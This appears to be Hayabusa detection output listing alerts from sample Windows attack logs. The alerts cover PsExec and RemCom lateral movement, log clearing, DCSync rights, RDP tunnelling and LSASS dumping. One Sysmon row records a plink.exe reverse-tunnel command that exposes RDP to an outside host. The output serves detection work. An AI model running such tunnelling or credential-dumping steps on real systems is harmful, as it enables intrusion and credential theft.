+09:00,IEWIN7,5145,high,Suspicious PsExec Execution,,rules/sigma/builtin/security/win_susp_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx -2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx -2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx -2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,First Time Seen Remote Named 
Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx -2019-01-20 16:00:50.800 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Security log was cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_bloodhound.evtx -2019-01-20 16:29:57.863 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Security log was cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_psloggedon.evtx -2019-02-02 18:16:52.479 +09:00,ICORP-DC.internal.corp,4776,informational,NTLM Logon to Local Account,User: helpdesk : Workstation evil.internal.corp : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx -2019-02-02 18:17:22.562 +09:00,ICORP-DC.internal.corp,4776,informational,NTLM Logon to Local Account,User: EXCHANGE$ : Workstation EXCHANGE : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx -2019-02-02 18:17:22.563 +09:00,ICORP-DC.internal.corp,4624,informational,Logon Type 3 - Network,User: EXCHANGE$ : Workstation: EXCHANGE : IP Address: 192.168.111.87 : Port: 58128 : LogonID: 0x24daa6,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx -2019-02-02 18:17:27.629 +09:00,ICORP-DC.internal.corp,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend 
Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx -2019-02-02 18:17:27.629 +09:00,ICORP-DC.internal.corp,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx -2019-02-14 00:15:04.175 +09:00,PC02.example.corp,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx -2019-02-14 00:15:08.689 +09:00,PC02.example.corp,4624,low,Logon Type 5 - Service,User: sshd_server : Workstation: PC02 : IP Address: - : Port: - : LogonID: 0xe509,rules/hayabusa/default/events/Security/Logons/4624_LogonType-5-Service.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx -2019-02-14 00:19:51.259 +09:00,PC02.example.corp,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: PC02 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x21f73 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx -2019-02-14 00:26:53.356 +09:00,PC02.example.corp,4624,informational,Logon Type 10 - RDP (Remote Interactive),User: IEUser : Workstation: PC02 : IP Address: 127.0.0.1 : Port: 49164 : LogonID: 0x45120 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-10-RemoteInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx -2019-02-14 00:26:53.356 +09:00,PC02.example.corp,4624,high,RDP Login from 
Localhost,,rules/sigma/builtin/security/win_rdp_localhost_login.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx -2019-02-14 00:29:40.657 +09:00,PC02.example.corp,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: PC02 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x4a26d : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx -2019-02-14 00:31:19.529 +09:00,PC02.example.corp,4624,informational,Logon Type 3 - Network,User: ANONYMOUS LOGON : Workstation: PC01 : IP Address: 10.0.2.17 : Port: 49168 : LogonID: 0x73d02,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx -2019-02-14 00:31:31.556 +09:00,PC02.example.corp,4624,informational,Logon Type 3 - Network,User: ANONYMOUS LOGON : Workstation: PC01 : IP Address: 10.0.2.17 : Port: 49169 : LogonID: 0x7d4f4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx -2019-02-14 03:01:41.593 +09:00,PC01.example.corp,1102,high,Security log was cleared,User: admin01,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx -2019-02-14 03:02:04.426 +09:00,PC01.example.corp,4624,informational,Logon Type 11 - CachedInteractive,User: user01 : Workstation: PC01 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1414c8 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-11-CachedInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx -2019-02-14 
03:02:04.426 +09:00,PC01.example.corp,4648,informational,Explicit Logon,Source User: PC01$ : Target User: user01 : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx -2019-02-14 03:02:04.526 +09:00,PC01.example.corp,4648,informational,Explicit Logon,Source User: PC01$ : Target User: user01 : IP Address: - : Process: C:\Windows\System32\lsass.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx -2019-02-14 03:02:04.526 +09:00,PC01.example.corp,4624,informational,Logon Type 7 - Unlock,User: user01 : Workstation: PC01 : IP Address: - : Port: - : LogonID: 0x1414d9,rules/hayabusa/default/events/Security/Logons/4624_LogonType-7-Unlock.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx -2019-02-14 03:04:01.632 +09:00,PC01.example.corp,5156,high,RDP over Reverse SSH Tunnel WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx -2019-02-14 03:04:01.632 +09:00,PC01.example.corp,5156,high,RDP over Reverse SSH Tunnel WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx -2019-02-14 03:04:43.171 +09:00,PC01.example.corp,4672,informational,Admin Logon,User: admin01 : LogonID: 0x14871d,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx -2019-02-14 03:04:45.905 +09:00,PC01.example.corp,5156,high,RDP over Reverse SSH Tunnel 
WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx -2019-02-14 03:04:45.905 +09:00,PC01.example.corp,5156,high,RDP over Reverse SSH Tunnel WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx -2019-02-14 03:04:57.442 +09:00,PC01.example.corp,4672,informational,Admin Logon,User: admin01 : LogonID: 0x148f5d,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx -2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4624,informational,Logon Type 10 - RDP (Remote Interactive),User: admin01 : Workstation: PC01 : IP Address: 127.0.0.1 : Port: 49274 : LogonID: 0x14a321 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-10-RemoteInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx -2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4672,informational,Admin Logon,User: admin01 : LogonID: 0x14a321,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx -2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4648,informational,Explicit Logon,Source User: PC01$ : Target User: admin01 : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx -2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4624,high,RDP Login from Localhost,,rules/sigma/builtin/security/win_rdp_localhost_login.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx -2019-02-14 03:04:58.363 
+09:00,PC01.example.corp,4624,low,Admin User Remote Logon,,rules/sigma/builtin/security/win_admin_rdp_login.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx -2019-02-16 19:02:21.934 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: plink.exe 10.0.2.18 -P 80 -C -R 127.0.0.3:4444:127.0.0.2:3389 -l test -pw test : Path: C:\Users\IEUser\Desktop\plink.exe : User: PC01\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx -2019-02-16 19:02:21.934 +09:00,PC01.example.corp,1,high,Suspicious Plink Remote Forwarding,,rules/sigma/process_creation/sysmon_susp_plink_remote_forward.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx -2019-02-16 19:02:21.934 +09:00,PC01.example.corp,1,medium,Exfiltration and Tunneling Tools Execution,,rules/sigma/process_creation/win_exfiltration_and_tunneling_tools_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx -2019-02-16 19:02:48.502 +09:00,PC01.example.corp,3,high,Suspicious Outbound RDP Connections,,rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx -2019-02-16 19:03:48.058 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: PC01\IEUser : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx -2019-02-16 19:04:04.141 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 0000003c : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
\SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx -2019-02-16 19:04:04.151 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx -2019-02-16 19:04:04.221 +09:00,PC01.example.corp,1,informational,Process Creation,Command: winlogon.exe : Path: C:\Windows\System32\winlogon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx -2019-02-16 19:04:04.351 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx -2019-02-16 19:04:04.892 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 0000003c : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx -2019-02-16 19:04:04.892 
+09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx -2019-02-16 19:04:04.962 +09:00,PC01.example.corp,1,informational,Process Creation,Command: winlogon.exe : Path: C:\Windows\System32\winlogon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx -2019-02-16 19:04:05.092 +09:00,PC01.example.corp,3,high,Suspicious Outbound RDP Connections,,rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx -2019-02-16 19:04:05.283 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx -2019-02-16 19:04:05.563 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\TSTheme.exe -Embedding : Path: C:\Windows\System32\TSTheme.exe : User: PC01\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and 
Control/DE_sysmon-3-rdp-tun.evtx -2019-02-16 19:05:26.499 +09:00,PC01.example.corp,1,informational,Process Creation,Command: atbroker.exe : Path: C:\Windows\System32\AtBroker.exe : User: PC01\IEUser : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx -2019-02-16 19:06:38.843 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe $(Arg0) : Path: C:\Windows\System32\taskhost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx -2019-02-17 02:54:26.956 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\RemComSvc.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx -2019-02-17 02:54:26.956 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\RemComSvc.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx -2019-02-17 02:55:47.181 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\RemComSvc.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx -2019-02-17 02:55:47.181 +09:00,PC01.example.corp,5145,informational,Network Share File 
Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\RemComSvc.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx -2019-02-17 02:57:41.475 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\RemComSvc.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx -2019-02-17 02:57:41.475 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\RemComSvc.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx -2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32\RemComSvc.exe : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx -2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32\RemComSvc.exe : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx -2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\System32\RemComSvc.exe : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx -2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32\RemComSvc.exe : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx -2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32 : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx -2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32 : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx -2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32 : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx -2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32 : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_REMCOM_5145_TargetHost.evtx -2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx -2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx -2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx -2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx -2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32\RemComSvc.exe : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx -2019-02-17 03:19:18.522 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\System32\RemComSvc.exe : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx -2019-03-18 04:09:41.328 +09:00,PC04.example.corp,11,high,LSASS Memory Dump File Creation,,rules/sigma/file_event/sysmon_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx -2019-03-18 04:09:41.328 +09:00,PC04.example.corp,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx -2019-03-18 04:10:03.991 +09:00,PC04.example.corp,11,high,LSASS Memory Dump File Creation,,rules/sigma/file_event/sysmon_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx -2019-03-18 04:10:03.991 +09:00,PC04.example.corp,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx -2019-03-18 04:26:42.116 +09:00,PC04.example.corp,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/net_share_drive_5142.evtx -2019-03-18 04:37:11.661 +09:00,PC04.example.corp,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_lsass_mimikatz_sekurlsa_logonpasswords.evtx -2019-03-18 04:37:11.661 +09:00,PC04.example.corp,10,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_lsass_mimikatz_sekurlsa_logonpasswords.evtx 
